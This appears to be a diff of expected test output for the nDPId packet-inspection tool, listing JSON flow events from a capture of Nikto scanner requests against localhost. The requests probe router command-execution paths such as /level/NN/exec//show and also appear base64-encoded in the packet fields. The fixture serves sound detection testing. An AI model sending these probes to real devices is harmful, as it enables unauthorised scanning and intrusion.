+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":623,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277695,"flow_last_seen":1576420277695,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277695,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50808,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/75\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001322)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":624,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277699,"flow_last_seen":1576420277699,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277699,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50810,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":624,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":624,"flow_packet_id":1,"flow_last_seen":1576420277699,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277699,"pkt":"AAAAAAAAAAAAAAAACABFAADIwYhAAEAGeqV\/AAABfwAAAcZ6H5CkKPiYt3JQbIAYAED+vAAAAQEICp1m\/uudZv7rR0VUIC9sZXZlbC83Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMjMpDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":624,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277699,"flow_last_seen":1576420277699,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277699,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50810,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/76\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001323)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":624,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277699,"flow_last_seen":1576420277699,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277699,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50810,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/76\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001323)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":625,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277701,"flow_last_seen":1576420277701,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277701,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50812,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":625,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":625,"flow_packet_id":1,"flow_last_seen":1576420277701,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277701,"pkt":"AAAAAAAAAAAAAAAACABFAADI\/s1AAEAGPWB\/AAABfwAAAcZ8H5AcB8fbr66aJ4AYAED+vAAAAQEICp1m\/u2dZv7tR0VUIC9sZXZlbC83Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzI0KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":625,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277701,"flow_last_seen":1576420277701,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277701,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50812,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/77\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001324)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":625,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277701,"flow_last_seen":1576420277701,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277701,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50812,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/77\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001324)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":626,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277702,"flow_last_seen":1576420277702,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277702,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50814,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":626,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":626,"flow_packet_id":1,"flow_last_seen":1576420277702,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277702,"pkt":"AAAAAAAAAAAAAAAACABFAADIfWpAAEAGvsN\/AAABfwAAAcZ+H5A9kER6aVFtF4AYAED+vAAAAQEICp1m\/u6dZv7uR0VUIC9sZXZlbC83OC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzI1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":626,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277702,"flow_last_seen":1576420277702,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277702,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50814,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/78\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001325)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":626,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277702,"flow_last_seen":1576420277702,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277702,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50814,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/78\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001325)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":627,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277703,"flow_last_seen":1576420277703,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277703,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50816,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":627,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":627,"flow_packet_id":1,"flow_last_seen":1576420277703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277703,"pkt":"AAAAAAAAAAAAAAAACABFAADIZuhAAEAG1UV\/AAABfwAAAcaAH5DHm1\/1JwgzKoAYAED+vAAAAQEICp1m\/u+dZv7vR0VUIC9sZXZlbC83OS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMjYpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":627,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277703,"flow_last_seen":1576420277703,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277703,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50816,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/79\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001326)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":627,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277703,"flow_last_seen":1576420277703,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277703,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50816,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/79\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001326)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":628,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277705,"flow_last_seen":1576420277705,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277705,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50818,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":628,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":628,"flow_packet_id":1,"flow_last_seen":1576420277705,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277705,"pkt":"AAAAAAAAAAAAAAAACABFAADIi\/NAAEAGsDp\/AAABfwAAAcaCH5DTprLkQgBQzIAYAED+vAAAAQEICp1m\/vGdZv7xR0VUIC9sZXZlbC84MC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMjcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":628,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277705,"flow_last_seen":1576420277705,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277705,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50818,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/80\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001327)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":628,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277705,"flow_last_seen":1576420277705,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277705,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50818,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/80\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001327)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":629,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277708,"flow_last_seen":1576420277708,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277708,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50820,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":629,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":629,"flow_packet_id":1,"flow_last_seen":1576420277708,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277708,"pkt":"AAAAAAAAAAAAAAAACABFAADI5e9AAEAGVj5\/AAABfwAAAcaEH5Dy8dz\/j320kYAYAED+vAAAAQEICp1m\/vOdZv7zR0VUIC9sZXZlbC84MS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMjgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":629,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277708,"flow_last_seen":1576420277708,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277708,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50820,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/81\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001328)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":629,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277708,"flow_last_seen":1576420277708,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277708,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50820,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/81\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001328)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":630,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277709,"flow_last_seen":1576420277709,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277709,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50822,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":630,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":630,"flow_packet_id":1,"flow_last_seen":1576420277709,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277709,"pkt":"AAAAAAAAAAAAAAAACABFAADIleJAAEAGpkt\/AAABfwAAAcaGH5A96Kz0htu5TYAYAED+vAAAAQEICp1m\/vWdZv71R0VUIC9sZXZlbC84Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzI5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":630,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277709,"flow_last_seen":1576420277709,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277709,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50822,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/82\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001329)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":630,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277709,"flow_last_seen":1576420277709,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277709,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50822,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/82\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001329)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":631,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277711,"flow_last_seen":1576420277711,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277711,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50824,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":631,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":631,"flow_packet_id":1,"flow_last_seen":1576420277711,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277711,"pkt":"AAAAAAAAAAAAAAAACABFAADIwilAAEAGegR\/AAABfwAAAcaIH5AoWfs0DfPUMYAYAED+vAAAAQEICp1m\/vedZv73R0VUIC9sZXZlbC84My9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":631,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277711,"flow_last_seen":1576420277711,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277711,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50824,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/83\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001330)"}}
